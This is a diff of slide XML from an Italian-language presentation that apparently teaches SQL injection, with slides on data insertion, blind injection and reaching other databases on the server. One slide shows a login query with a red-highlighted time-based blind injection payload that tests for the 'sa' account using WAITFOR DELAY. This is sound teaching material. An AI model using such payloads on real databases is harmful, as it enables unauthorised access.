 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -14304,15 +15255,7 @@
             <a:pPr lvl="0" algn="ctr"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Stringhe</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> di </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ricerca</a:t>
+              <a:t>Inserimento</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -14320,7 +15263,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>interessanti</a:t>
+              <a:t>dati</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -14658,7 +15601,255 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide18.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide2.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 127">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEC36896-F088-20D9-945D-99CB4EFE147D}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="128" name="Google Shape;128;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAC840DB-0542-C018-463E-551827295DAE}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1290150" y="1454970"/>
+            <a:ext cx="6563700" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Una query semplice </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>che</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> non </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>farò</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>mai</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>più</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="129" name="Google Shape;129;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E56BAEF-7CD9-1247-163D-1BAB62A8159B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="130" name="Google Shape;130;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C92B92F-C172-4888-CA57-4ED85DDF0E64}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1355850" y="2631175"/>
+            <a:ext cx="6887100" cy="1546200"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="127000" lvl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>SELECT TOP (1)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	*</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>dbo.Users</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>WHERE Email = 'test@example.com'</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	AND Password = 'password123';</a:t>
+            </a:r>
+            <a:endParaRPr sz="1600" dirty="0">
+              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1532512923"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide20.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -14715,15 +15906,7 @@
             <a:pPr lvl="0" algn="ctr"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Stringhe</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> di </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ricerca</a:t>
+              <a:t>Inserimento</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -14731,7 +15914,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>interessanti</a:t>
+              <a:t>dati</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -15051,7 +16234,252 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide19.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide21.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 127">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8083DC95-3002-1CA4-9F0F-A815BC0F63C3}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="128" name="Google Shape;128;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E3035CC-E2D0-1C86-680F-BEEF7D3BD657}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1290150" y="1454970"/>
+            <a:ext cx="6563700" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr lvl="0" algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>SQL Injection #4: blind SQL injection</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="129" name="Google Shape;129;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D387EF08-5BA7-846B-194A-DECEE767AF5C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="130" name="Google Shape;130;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAC2156D-FE07-A41C-E0FF-8D4A7410BEF8}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1128450" y="2195169"/>
+            <a:ext cx="6887100" cy="2292051"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="127000">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>SELECT TOP (1)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	*</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>dbo.Users</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>WHERE Email = 'test@example.com'</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	AND Password = '</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>'; IF (SELECT SYSTEM_USER) = '</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>sa</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>' WAITFOR DELAY '00:00:05';--</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>';</a:t>
+            </a:r>
+            <a:endParaRPr sz="1400" dirty="0">
+              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1658621342"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide22.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -15108,15 +16536,7 @@
             <a:pPr lvl="0" algn="ctr"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Stringhe</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> di </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ricerca</a:t>
+              <a:t>Recuperare</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -15124,7 +16544,27 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>interessanti</a:t>
+              <a:t>altri</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> database </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>sullo</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>stesso</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> server</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -15372,226 +16812,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide2.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 127"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="128" name="Google Shape;128;p31"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1290150" y="1454970"/>
-            <a:ext cx="6563700" cy="572700"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Una query semplice </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>che</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> non </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>farò</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>mai</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>più</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="129" name="Google Shape;129;p31"/>
-          <p:cNvPicPr preferRelativeResize="0"/>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId3">
-            <a:alphaModFix/>
-          </a:blip>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4116500" y="448013"/>
-            <a:ext cx="911000" cy="911000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="130" name="Google Shape;130;p31"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1355850" y="2631175"/>
-            <a:ext cx="6887100" cy="1546200"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="127000" lvl="0">
-              <a:lnSpc>
-                <a:spcPct val="115000"/>
-              </a:lnSpc>
-              <a:buClr>
-                <a:srgbClr val="D93232"/>
-              </a:buClr>
-              <a:buSzPts val="1600"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>SELECT TOP (1)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1600" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>	*</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1600" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>FROM </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>dbo.Users</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1600" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>WHERE Email = 'test@example.com'</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1600" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1600" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>	AND Password = 'password123';</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600" dirty="0">
-              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide20.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide23.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -15648,15 +16869,15 @@
             <a:pPr lvl="0" algn="ctr"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Stringhe</a:t>
+              <a:t>Recuperare</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> di </a:t>
+              <a:t> la </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ricerca</a:t>
+              <a:t>struttura</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -15664,7 +16885,19 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>interessanti</a:t>
+              <a:t>degli</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>altri</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> database</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
